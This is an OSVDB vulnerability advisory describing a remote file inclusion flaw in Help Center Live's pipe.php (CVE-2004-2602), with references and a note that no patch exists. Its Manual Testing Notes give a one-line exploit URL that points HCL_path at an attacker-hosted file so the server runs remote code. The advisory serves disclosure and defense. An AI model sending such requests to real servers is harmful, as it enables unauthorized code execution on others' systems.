Help Center Live pipe.php Arbitrary Command Execution

2004-12-24T17:02:16
ID OSVDB:12598
Type osvdb
Reporter James Bercegay()
Modified 2004-12-24T17:02:16

Description

Vulnerability Description

Help Center Live contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to pipe.php not properly sanitizing user input supplied to the HCL_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Help Center Live contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to pipe.php not properly sanitizing user input supplied to the HCL_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[victim]/inc/pipe.php?HCL_path=http://[attacker]/

References:

Vendor URL: http://www.helpcenterlive.com/ Security Tracker: 1012685 Secunia Advisory ID:13652 Related OSVDB ID: 12597 Related OSVDB ID: 12631 Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00058-12242004 Keyword: Remote File Inclusion CVE-2004-2602 Bugtraq ID: 12105